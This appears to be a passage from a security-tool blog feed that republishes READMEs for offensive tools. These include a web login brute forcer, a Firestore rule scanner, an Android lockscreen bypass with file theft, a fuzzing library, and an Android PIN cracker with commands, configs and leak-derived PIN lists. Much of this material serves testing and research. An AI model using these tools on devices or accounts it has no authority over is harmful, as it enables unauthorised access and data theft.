href="http://4.bp.blogspot.com/-s9ssDwmdxbM/YLcmrlgUiHI/AAAAAAAADWY/yBA7Ehx5dB4tyRz4S_SWpemW30yVO9C7QCK4BGAYYCw/s1600/Arkhota_8_7-726634.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081478623037554" src="http://4.bp.blogspot.com/-s9ssDwmdxbM/YLcmrlgUiHI/AAAAAAAADWY/yBA7Ehx5dB4tyRz4S_SWpemW30yVO9C7QCK4BGAYYCw/s320/Arkhota_8_7-726634.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/8.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (12)"></a><a href="http://2.bp.blogspot.com/-3yWjJiQNJus/YLcmr3AByZI/AAAAAAAADWg/TiwPdDTYa3YswhnMJeCIfmRD6R4ELHYmwCK4BGAYYCw/s1600/Arkhota_9_8-727314.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081483319429522" src="http://2.bp.blogspot.com/-3yWjJiQNJus/YLcmr3AByZI/AAAAAAAADWg/TiwPdDTYa3YswhnMJeCIfmRD6R4ELHYmwCK4BGAYYCw/s320/Arkhota_9_8-727314.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/9.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (13)"></a><a href="http://4.bp.blogspot.com/-vjUuGR06zKc/YLcmsGgiFOI/AAAAAAAADWo/SJraZbSWEzkUP4p0Hj1-dgCfD18W_CNnQCK4BGAYYCw/s1600/Arkhota_10_9-728314.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081487482295522" src="http://4.bp.blogspot.com/-vjUuGR06zKc/YLcmsGgiFOI/AAAAAAAADWo/SJraZbSWEzkUP4p0Hj1-dgCfD18W_CNnQCK4BGAYYCw/s320/Arkhota_10_9-728314.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/10.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (14)"></a><a href="http://4.bp.blogspot.com/-_zev7MG90bE/YLcmsZL5dSI/AAAAAAAADWw/S1WWNVFywAo0rih8kM5ASpN6kld6RyStwCK4BGAYYCw/s1600/Arkhota_11_10-729011.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081492496020770" src="http://4.bp.blogspot.com/-_zev7MG90bE/YLcmsZL5dSI/AAAAAAAADWw/S1WWNVFywAo0rih8kM5ASpN6kld6RyStwCK4BGAYYCw/s320/Arkhota_11_10-729011.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/pc-1.png" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (15)"></a><a href="http://2.bp.blogspot.com/-KTj5X9enKEc/YLcmsdnnpTI/AAAAAAAADW4/OiKXH1IgZFc3FQ1Fjk61AvxOSSBoqsdzgCK4BGAYYCw/s1600/Arkhota_12_pc-1-729786.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081493686035762" src="http://2.bp.blogspot.com/-KTj5X9enKEc/YLcmsdnnpTI/AAAAAAAADW4/OiKXH1IgZFc3FQ1Fjk61AvxOSSBoqsdzgCK4BGAYYCw/s320/Arkhota_12_pc-1-729786.png" /></a></p> <p><a href="https://www.youtube.com/watch?v=CIazE0Jhj_c" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (16)"></a><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/CIazE0Jhj_c" title="YouTube video player" width="560"></iframe></p> <br /><span style="font-size: large;"><b>[W]arning</b></span><br /> <br /><b>Runtime changeable parameters</b><br /> <p>Every parameter editable during attack, but none of the parameters will changeable during attack, except two. "Fail/Success" and "Beep" switch.</p> <p>This means: If you started the attack, and want to change a parameter (e.g charset), editing will not change anything, this changes applies after pressing start button. BUT If you started the attack with beep option on, and you want to change it. You don't need to re-start attack, just click on switch and it won't beep when attack success.</p> <br /><b>About "Generate" & Custom wordlists</b><br /> <p>The Generate option is <strong>NOT</strong> recommended Runtime generating & parsing is a really hard work for a phone. Also it's not stable, all possible words will be generated, but may not be sequential. If you really need to select it, keep everything minimum. If your phone freezes or crashes, you know selected options is not suitable your phone's processor.</p> <p>Do <strong>NOT</strong> place big <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="wordlists">wordlists</a> to /ABF/ directory. This will cause freezing & crashing.</p> <p>And do <strong>NOT</strong> forget standard smartphones have far less processor power rather than a computer, this project is for small and quick attacks.</p> <br /><b>About speed</b><br /> <p>Depends on your speed of network & <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="remote">remote</a> host.</p> <br /><span style="font-size: large;"><b>How to stop the attack</b></span><br /> <p>This version of Arkhota doesn't support "stopping the attack". <strong>BUT</strong> that doesn't mean you cannot stop. Just change "Fail/Success" switch to opposite direction and wait one more request. This will cause a false-positive on purpose to stop. Or You can simply close and re-open the application.</p> <br /><b><em><strong>PS: I know.. I know... This project gave me a headache, I didn't even try to put a stop button there.</strong></em></b><br /> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ALW1EZ/Arkhota" rel="nofollow" target="_blank" title="Download Arkhota">Download Arkhota</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5180328804030424482021-05-27T08:30:00.011-04:002021-05-27T08:30:00.295-04:00FireStorePwn - Firestore Database Vulnerability Scanner Using APKs<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mL438l63hTg/YKrzEkXE_-I/AAAAAAAAWRI/87DCc19R3mkIcrf4T7PdNh_tcQ6UoYWVACNcBGAsYHQ/s808/FireStorePwn_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="808" data-original-width="790" height="640" src="https://1.bp.blogspot.com/-mL438l63hTg/YKrzEkXE_-I/AAAAAAAAWRI/87DCc19R3mkIcrf4T7PdNh_tcQ6UoYWVACNcBGAsYHQ/w626-h640/FireStorePwn_1.png" width="626" /></a></div><p><br /></p><p>fsp scans an APK and checks the Firestore database for rules that are not secure, <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> with or without authentication.</p> <p>If there are problems with the security rules, attackers could steal, modify or delete data and raise the bill.</p><span><a name='more'></a></span><h3 align="center"><span style="font-size: x-large;"><b>Install fsp</b></span><br /> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp sudo chmod +x /bin/fsp "><pre><code>sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp<br />sudo chmod +x /bin/fsp</code></pre></div> <br /><b>Running fsp</b><br /> <br /><b>Scanning an APK without authentication</b><br /> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk "><pre><code>fsp app.apk</code></pre></div> <br /><b>Scanning an APK with authentication</b><br /> </h3><p>With <a href="https://www.kitploit.com/search/label/Email" target="_blank" title="email">email</a> and password.</p> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk test@test.com:123456 "><pre><code>fsp app.apk test@test.com:123456</code></pre></div> <p>With a token.</p> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk eyJhbGciO... "><pre><code>fsp app.apk eyJhbGciO...</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/takito1812/FireStorePwn" rel="nofollow" target="_blank" title="Download FireStorePwn">Download FireStorePwn</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47283001476656203832021-05-24T17:30:00.008-04:002021-05-24T17:30:00.302-04:00CiLocks - Android LockScreen Bypass<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><p>CiLocks - Android LockScreen Bypass</p><br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Brute Pin 4 Digit</li> <li>Brute Pin 6 Digit</li> <li>Brute LockScreen Using Wordlist</li> <li>Bypass LockScreen {Antiguard} Not Support All OS Version</li> <li>Root <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> {Supersu} Not Support All OS Version</li> <li>Steal File</li> <li>Reset Data</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Required</b></span><br /> <br /> - Adb {Android SDK} <br /> - Cable Usb <br /> - Android <a href="https://www.kitploit.com/search/label/Emulator" target="_blank" title="Emulator">Emulator</a> {NetHunter/Termux} Root <br /> - Or Computer <br /> <br /><span style="font-size: large;"><b> Compatible </b></span><br /> <br /> - Linux <br /> - <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <br /> - Mac <br /> <br /><span style="font-size: large;"><b> Tested On </b></span><br /><br /> - <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> <br /> <br /><span style="font-size: large;"><b> How To Run </b></span><br /><br /> - git clone <a href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="https://github.com/tegal1337/CiLocks">https://github.com/tegal1337/CiLocks</a> <br /> - cd CiLocks <br /> - chmod +x cilocks <br /> - bash cilocks <br /> <br /> <br /><span style="font-size: x-large;"><b> For Android Emulator </b></span><br /> <br /> - Install Busybox <br /> - Root <br /> <br /><b> If <a href="https://www.kitploit.com/search/label/Brute" target="_blank" title="brute">brute</a> doesn't work then uncomment this code </b><br /><br /> `# adb shell input keyevent 26` <br /> if 5x the wrong password will automatically delay 30 seconds<div> <br /><span style="font-size: large;"><b>Image </b></span><br /><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b> Video</b></span><br /> <br /> Bypass LockScreen <br /> <a href="https://youtu.be/PPMhzt4lGmU" rel="nofollow" target="_blank" title="https://youtu.be/PPMhzt4lGmU">https://youtu.be/PPMhzt4lGmU</a> <br /> BruteForce Pin <br /> <a href="https://youtu.be/D2xjJUQ9Lsw" rel="nofollow" target="_blank" title="https://youtu.be/D2xjJUQ9Lsw">https://youtu.be/D2xjJUQ9Lsw</a> <br /><span style="font-size: large;"><b>Reference And Media</b></span><br /> <br /> <a href="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb">https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb</a> <br /> <a href="http://www.hak5.org/episodes/hak5-1205" rel="nofollow" target="_blank" title="http://www.hak5.org/episodes/hak5-1205">http://www.hak5.org/episodes/hak5-1205</a> <br /> <a href="https://github.com/kosborn/p2p-adb" rel="nofollow" target="_blank" title="https://github.com/kosborn/p2p-adb">https://github.com/kosborn/p2p-adb</a> <br /> <a href="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/">https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/</a> <br /> <a href="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android">https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android</a> <br /> Contac Me <a href="mailto:mitsuhamizaki@gmail.com" rel="nofollow" target="_blank" title="Email">Email</a> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="Download CiLocks">Download CiLocks</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19667631920258967142021-05-04T08:30:00.001-04:002021-05-04T08:30:00.315-04:00LibAFL - Advanced Fuzzing Library - Slot Your Fuzzer Together In Rust! Scales Across Cores And Machines. For Windows, Android, MacOS, Linux, No_Std, ...<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AT4J9W2Uo1I/YJCFiz1LHMI/AAAAAAAAWEM/qer0ynXBIIYGqbtrm8LwOk0QylDd9ZzYgCNcBGAsYHQ/s256/LibAFL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" src="https://1.bp.blogspot.com/-AT4J9W2Uo1I/YJCFiz1LHMI/AAAAAAAAWEM/qer0ynXBIIYGqbtrm8LwOk0QylDd9ZzYgCNcBGAsYHQ/s16000/LibAFL.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Advanced <a href="https://www.kitploit.com/search/label/Fuzzing" target="_blank" title="Fuzzing">Fuzzing</a> Library - Slot your own fuzzers together and extend their features using Rust.</p> <p>LibAFL is written and maintained by Andrea Fioraldi <a href="mailto:andreafioraldi@gmail.com" rel="nofollow" target="_blank" title="andreafioraldi@gmail.com">andreafioraldi@gmail.com</a> and Dominik Maier <a href="mailto:mail@dmnk.co" rel="nofollow" target="_blank" title="mail@dmnk.co">mail@dmnk.co</a>.</p> <br /><span style="font-size: large;"><b>Why LibAFL?</b></span><br /> <p>LibAFL gives you many of the benefits of an off-the-shelf fuzzer, while being completely customizable. Some <a href="https://www.kitploit.com/search/label/Highlight" target="_blank" title="highlight">highlight</a> features currently include:</p> <ul> <li><code>fast</code>: We do everything we can at compile time, keeping runtime overhead minimal. Users reach 120k execs/sec in frida-mode on a phone (using all cores).</li> <li><code>scalable</code>: <code>Low Level Message Passing</code>, <code>LLMP</code> for short, allows LibAFL to scale almost linearly over cores, and via TCP to multiple machines soon!</li> <li><code>adaptable</code>: You can replace each part of LibAFL. For example, <code>BytesInput</code> is just one potential form input: feel free to add an AST-based input for structured fuzzing, and more.</li> <li><code>multi platform</code>: LibAFL was confirmed to work on <em>Windows</em>, <em>MacOS</em>, <em>Linux</em>, and <em>Android</em> on <em>x86_64</em> and <em>aarch64</em>. <code>LibAFL</code> can be built in <code>no_std</code> mode to inject LibAFL into obscure targets like <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> devices and hypervisors.</li> <li><code>bring your own target</code>: We support binary-only modes, like Frida-Mode, as well as multiple compilation passes for sourced-based instrumentation. Of course it's easy to add custom <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="instrumentation">instrumentation</a> backends.</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Overview</b></span><br /> <p>LibAFL is a collection of reusable pieces of fuzzers, written in Rust. It is fast, multi-platform, no_std compatible, and scales over cores and machines.</p> <p>It offers a main crate that provide building blocks for custom fuzzers, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl" rel="nofollow" target="_blank" title="libafl">libafl</a>, a library containing common code that can be used for targets instrumentation, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_targets" rel="nofollow" target="_blank" title="libafl_targets">libafl_targets</a>, and a library providing facilities to wrap compilers, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_cc" rel="nofollow" target="_blank" title="libafl_cc">libafl_cc</a>.</p> <p>LibAFL offers integrations with popular instrumentation frameworks. At the moment, the supported backends are:</p> <ul> <li>SanitizerCoverage, in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_targets" rel="nofollow" target="_blank" title="libafl_targets">libafl_targets</a></li> <li>Frida, in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_frida" rel="nofollow" target="_blank" title="libafl_frida">libafl_frida</a>, by s1341 <a href="mailto:github@shmarya.net" rel="nofollow" target="_blank" title="github@shmarya.net">github@shmarya.net</a> (Windows support is broken atm, it relies on <a href="https://github.com/meme/frida-rust/issues/9" rel="nofollow" target="_blank" title="this upstream issue">this upstream issue</a> to be fixed.)</li> <li>More to come (QEMU-mode, ...)</li> </ul> <br /><span style="font-size: large;"><b>Getting started</b></span><br /> <ol> <li> <p>Install the Rust development language. We highly recommend <em>not</em> to use e.g. your Linux distribution package as this is likely outdated. So rather install Rust directly, instructions can be found <a href="https://www.rust-lang.org/tools/install" rel="nofollow" target="_blank" title="here">here</a>.</p> </li> <li> <p>Clone the LibAFL repository with</p> </li> </ol> <pre><code>git clone https://github.com/AFLplusplus/LibAFL<br /></code></pre> <p>If you want to get the latest and greatest features,</p> <pre><code>git checkout dev<br /></code></pre> <p>Build the library using</p> <pre><code>cargo build --release<br /></code></pre> <ol start="4"> <li>Build the API documentation with</li> </ol> <pre><code>cargo doc<br /></code></pre> <ol start="5"> <li>Browse the LibAFL book (WIP!) with (requires <a href="https://github.com/rust-lang/mdBook" rel="nofollow" target="_blank" title="mdbook">mdbook</a>)</li> </ol> <pre><code>cd docs && mdbook serve<br /></code></pre> <p>We collect all example fuzzers in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/fuzzers" rel="nofollow" target="_blank" title="Advanced Fuzzing Library - Slot your Fuzzer together in Rust! Scales across cores and machines. For Windows, Android, MacOS, Linux, no_std, ... (17)"><code>./fuzzers</code></a>. Be sure to read their documentation (and source), this is <em>the natural way to get started!</em></p> <p>The best-tested fuzzer is <a href="https://github.com/AFLplusplus/LibAFL/blob/main/fuzzers/libfuzzer_libpng" rel="nofollow" target="_blank" title="Advanced Fuzzing Library - Slot your Fuzzer together in Rust! Scales across cores and machines. For Windows, Android, MacOS, Linux, no_std, ... (18)"><code>./fuzzers/libfuzzer_libpng</code></a>, a multicore libfuzzer-like fuzzer using LibAFL for a libpng harness.</p> <br /><span style="font-size: large;"><b>Resources</b></span><br /> <ul> <li> <p><a href="https://github.com/AFLplusplus/LibAFL/blob/main/docs/src/getting_started/setup.md" rel="nofollow" target="_blank" title="Installation guide">Installation guide</a></p> </li> <li> <p>Our RC3 <a href="http://www.youtube.com/watch?v=3RWkT1Q5IV0" rel="nofollow" target="_blank" title="talk">talk</a> explaining the core concepts</p> </li> <li> <p><a href="https://docs.rs/libafl/" rel="nofollow" target="_blank" title="Online API documentation">Online API documentation</a></p> </li> <li> <p>The LibAFL book (very WIP) <a href="https://aflplus.plus/libafl-book" rel="nofollow" target="_blank" title="online">online</a> or in the <a href="https://github.com/AFLplusplus/LibAFL/blob/main/docs/src" rel="nofollow" target="_blank" title="repo">repo</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Check the <a href="https://github.com/AFLplusplus/LibAFL/blob/main/TODO.md" rel="nofollow" target="_blank" title="TODO.md">TODO.md</a> file for features that we plan to support.</p> <p>For bugs, feel free to open issues or contact us directly. Thank you for your support. <3</p> <div><br /></div><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/AFLplusplus/LibAFL" rel="nofollow" target="_blank" title="Download LibAFL">Download LibAFL</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-91350405154304897182021-04-17T08:30:00.033-04:002021-04-17T08:30:00.320-04:00Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/s989/Android-PIN-Bruteforce_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="684" data-original-width="989" height="442" src="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/w640-h442/Android-PIN-Bruteforce_1.png" width="640" /></a></div><p><br /></p> <p>Unlock an Android phone (or device) by <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> the lockscreen PIN.</p> <p>Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices!</p><span style="font-size: large;"><b> How it works</b></span><br /> <p>It uses a USB OTG cable to connect the locked phone to the Nethunter device. It emulates a keyboard, automatically tries PINs, and waits after trying too many wrong guesses.</p> <p>[Nethunter phone] <--> [USB cable] <--> [USB OTG adaptor] <--> [Locked Android phone]</p> <p>The USB HID Gadget driver provides emulation of USB Human Interface Devices (HID). This enables an Android Nethunter device to emulate keyboard input to the locked phone. It's just like plugging a keyboard into the locked phone and pressing keys.</p> <p></p><div>This takes just over 16.6 hours with a Samsung S5 to try all possible 4 digit PINs, but with the optimised PIN list it should take you much less time.</div><div><br /></div><b>You will need</b><br /> <ul> <li>A locked Android phone</li> <li>A Nethunter phone (or any rooted Android with HID kernel support)</li> <li>USB OTG (On The Go) cable/adapter (USB male Micro-B to female USB A), and a standard charging cable (USB male Micro-B to male A).</li> <li>That's all!</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b> Benefits</b></span><br /> <ul> <li>Turn your NetHunter phone into an Android PIN cracking machine</li> <li>Unlike other methods, you do not need ADB or USB debugging enabled on the locked phone</li> <li>The locked Android phone does not need to be rooted</li> <li>You don't need to buy special hardware, e.g. Rubber Ducky, Teensy, Cellebrite, XPIN Clip, etc.</li> <li>You can easily modify the backoff time to crack other types of devices</li> <li>It works!</li></ul><div><br /></div><span style="font-size: large;"><b> Features</b></span><br /> <ul> <li>Crack PINs of any length from 1 to 10 digits</li> <li>Use config files to support different phones</li> <li>Optimised PIN lists for 3,4,5, and 6 digit PINs</li> <li>Bypasses phone pop-ups including the Low Power warning</li> <li>Detects when the phone is unplugged or powered off, and waits while retrying every 5 seconds</li> <li>Configurable delays of N seconds after every X PIN attempts</li> <li>Log file</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>TBC</p> <br /><span style="font-size: large;"><b>Executing the script</b></span><br /> <p>If you installed the script to /sdcard/, you can execute it with the following command.</p> <p><code>bash ./android-pin-bruteforce</code></p> <p>Note that Android mounts /sdcard with the noexec flag. You can verify this with <code>mount</code>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code><br />Android-PIN-Bruteforce (0.1) is used to unlock an Android phone (or device) by bruteforcing the lockscreen PIN.<br /> Find more information at: https://github.com/urbanadventurer/Android-PIN-Bruteforce<br /><br />Commands:<br /> crack Begin cracking PINs<br /> resume Resume from a chosen PIN<br /> rewind Crack PINs in reverse from a chosen PIN<br /> diag Display diagnostic information<br /> version Display version information and exit<br /><br />Options:<br /> -f, --from PIN Resume from this PIN<br /> -a, --attempts Starting from NUM incorrect attempts<br /> -m, --mask REGEX Use a mask for known digits in the PIN<br /> -t, --type TYPE Select PIN or PATTERN cracking<br /> -l, --length NUM Crack PINs of NUM length<br /> -c, --config FILE Specify configuration file to load<br /> -p, --pinlist FILE Specify a custom PIN list<br /> -d, --dry-run Dry run for testing. Does n't send any keys.<br /> -v, --verbose Output verbose logs<br /><br />Usage:<br /> android-pin-bruteforce <command> [options]<br /></code></pre> <br /><span style="font-size: large;"><b>Supported Android Phones/Devices</b></span><br /> <p>This has been successfully tested with various phones including the Samsung S5, S7, Motorola G4 Plus and G5 Plus.</p> <p>It can unlock Android versions 6.0.1 through to 10.0. The ability to perform a bruteforce attack doesn't depend on the Android version in use. It depends on how the device vendor developed their own lockscreen.</p> <p>Check the Phone Database for more details <a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database">https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database</a></p><p><br /></p><span style="font-size: large;"><b> PIN Lists</b></span><br /> <p>Optimised PIN lists are used by default unless the user selects a custom PIN list.</p> <br /><b>Cracking PINs of different lengths</b><br /> <p>Use the <code>--length</code> commandline option.</p> <p>Use this command to crack a 3 digit PIN, <code>./android-pin-bruteforce crack --length 3</code></p> <p>Use this command to crack a 6 digit PIN <code>./android-pin-bruteforce crack --length 6</code></p> <br /><b>Where did the optimised PIN lists come from?</b><br /> <p>The optimised PIN lists were generated by extracting numeric passwords from database leaks then sorting by frequency. All PINs that did not appear in the password leaks were appended to the list.</p> <p>The optimised PIN lists were generated from <em>Ga$$Pacc DB Leak</em> (21GB decompressed, 688M Accounts, 243 Databases, 138920 numeric passwords).</p> <br /><b>The 4 digit PIN list</b><br /> <p>The reason that the 4 digit PIN list is used from a different source is because it gives better results than the generated list from <em>Ga$$Pacc DB Leak</em>.</p> <p><code>optimised-pin-length-4.txt</code> is an optimised list of all possible 4 digit PINs, sorted by order of likelihood. It can be found with the filename <code>pinlist.txt</code> at <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>This list is used with permission from Justin Engler & Paul Vines from Senior Security Engineer, iSEC Partners, and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a></p> <br /><b>Cracking with Masks</b><br /> <p>Masks use <a href="https://www.kitploit.com/search/label/Regular%20Expressions" target="_blank" title="regular expressions">regular expressions</a> with the standard grep extended format.</p> <p><code>./android-pin-bruteforce crack --mask "...[45]" --dry-run</code></p> <ul> <li>To try all years from 1900 to 1999, use a mask of <code>19..</code></li> <li>To try PINs that have a 1 in the first digit, and a 1 in the last digit, use a mask of <code>1..1</code></li> <li>To try PINs that end in 4 or 5, use <code>...[45]</code></li></ul><div><span style="font-family: monospace;"><br /></span></div><span style="font-size: large;"><b> Configuration for different phones</b></span><br /> <p>Device manufacturers create their own lock screens that are different to the default or stock Android. To find out what keys your phone needs, plug a keyboard into the phone and try out different combinations.</p> <p>Load a different configuration file, with the <code>--config FILE</code> commandline parameter.</p> <p>Example: <code>./android-pin-bruteforce --config ./config.samsung.s5 crack</code></p> <p>You can also edit the <code>config</code> file by customising the timing and keys sent.</p> <p>The following configuration variables can be used to support a different phone's lockscreen.</p> <pre><code># Timing<br />## DELAY_BETWEEN_KEYS is the period of time in seconds to wait after each key is sent<br />DELAY_BETWEEN_KEYS=0.25<br /><br />## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br />## SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END defines how many seconds before the end of the cooldown period, keys will be sent<br /># set to 0 to disable<br />SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END=5<br />## SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END configures the keys that are sent to dismiss messages and popups before the end of the cooldown period<br />SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END="enter enter enter"<br /><br />## KEYS_BEFORE_EACH_PIN configures the keys that are sent to prompt the lock screen to appear. This is sent before each PIN.<br />## By default it sends "escape enter", but some phones will respond to other keys.<br /><br /># Examples:<br /># KEYS_BEFORE_EACH_PIN="ctrl_escape enter"<br /># KEYS_BEFORE_EACH_PIN="escape space"<br />KEYS_BEFORE_EACH_PIN="escape enter"<br /><br />## KEYS_STAY_AWAKE_DURING_COOLDOWN the keys that are sent during the cooldown period to keep the phone awake<br />KEYS_STAY_AWAKE_DURING_COOLDOWN="enter"<br /><br />## SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS how often the keys are sent, in seconds<br />SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS=5<br /><br />## 